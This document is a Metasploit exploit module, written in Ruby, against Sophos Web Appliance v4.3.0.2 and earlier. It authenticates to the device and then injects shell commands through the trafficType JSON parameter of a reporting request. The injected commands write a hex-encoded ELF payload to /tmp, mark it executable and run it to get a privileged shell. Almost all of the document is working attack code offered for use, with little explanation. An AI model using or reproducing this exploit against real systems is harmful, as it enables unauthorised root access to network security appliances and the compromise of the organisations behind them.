# Exploit Title: Sophos Web Appliance reporting JSON trafficType Remote Command Injection Vulnerablity # Date: 01/28/2017 # Exploit Author: xort @ Critical Start # Vendor Homepage: www.sophos.com # Software Link: sophos.com/en-us/products/secure-web-gateway.aspx # Version: 4.3.0.2 # Tested on: 4.3.0.2 # # CVE : (awaiting cve) # vuln: report command / trafficType JSON parameter / ???.php exploit # Description PostAuth Sophos Web App FW <= v4.3.0.2 for capablities. This exploit leverages a command injection bug. # # xort @ Critical Start require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Sophos Web Appliace <= v4.3.0.2 JSON reporting remote exploit', 'Description' => %q{ This module exploits a remote command execution vulnerability in the Sophos Web Appliace Version <= v4.3.0.2. The vulnerability exist in a section of the machine's reporting inferaface that accepts unsanitized unser supplied information within a JSON query. }, 'Author' => [ 'xort@Critical Start', # vuln + metasploit module ], 'Version' => '$Revision: 1 $', 'References' => [ [ 'none', 'none'], ], 'Platform' => [ 'linux'], 'Privileged' => true, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'Payload' => { 'Compat' => { 'ConnectionType' => 'find', } }, 'Targets' => [ ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0)) register_options( [ OptString.new('PASSWORD', [ false, 'Device password', "" ]), OptString.new('USERNAME', [ true, 'Device password', "admin" ]), OptString.new('CMD', [ false, 'Command to execute', "" ]), Opt::RPORT(443), ], self.class) end def do_login(username, password_clear) vprint_status( "Logging into machine with credentials...\n" ) # vars timeout = 1550; style_key = Rex::Text.rand_text_hex(32) # send request res = send_request_cgi( { 'method' => 'POST', 'uri' => "/index.php", 'vars_get' => { 'c' => 'login', }, 'vars_post' => { 'STYLE' => style_key, 'destination' => '', 'section' => '', 'username' => username, 'password' => password_clear }, 'headers' => { 'Connection' => 'close', } }, timeout) return style_key end def run_command(username, style_password, cmd) vprint_status( "Running Command...\n" ) # send request with payload res = send_request_cgi({ 'method' => 'POST', 'uri' => "/index.php", 'vars_post' => { 'chart' => 'pie', 'period' => 'custom', 'multiplier' => '1', 'metric' => '', 'token' => '0.3156784180233425', 'start' => '1/27/2017', 'end' => '1/27/2017', 'filters' => '{"topn": "25", "trafficType": "out|'+cmd+'&", "department": "sophos_swa_all_departments"}', 'pdf' => '1', 'test' => '', 'STYLE' => style_password , }, 'vars_get' => { 'c' => 'report', 'name' => 'traf_users', 'STYLE' => style_password , }, }) end def exploit # timeout timeout = 1550; # params password_clear = datastore['PASSWORD'] user = datastore['USERNAME'] # do authentication style_hash = do_login(user, password_clear) vprint_status("STATUS hash authenticated: #{style_hash}\n") # pause to let things run smoothly sleep(2) #if no 'CMD' string - add code for root shell if not datastore['CMD'].nil? and not datastore['CMD'].empty? cmd = datastore['CMD'] # Encode cmd payload encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\\x\1\2') # upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload) run_command(user, style_hash, ("echo -e #{encoded_cmd}>/tmp/n;chmod +rx /tmp/n;/tmp/n" )) else # Encode payload to ELF file for deployment elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\\x\1\2') # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload) run_command(user, style_hash, ("(echo -e #{encoded_elf}>/tmp/m;chmod +rx /tmp/m;/tmp/m)")) # wait for magic handler end end end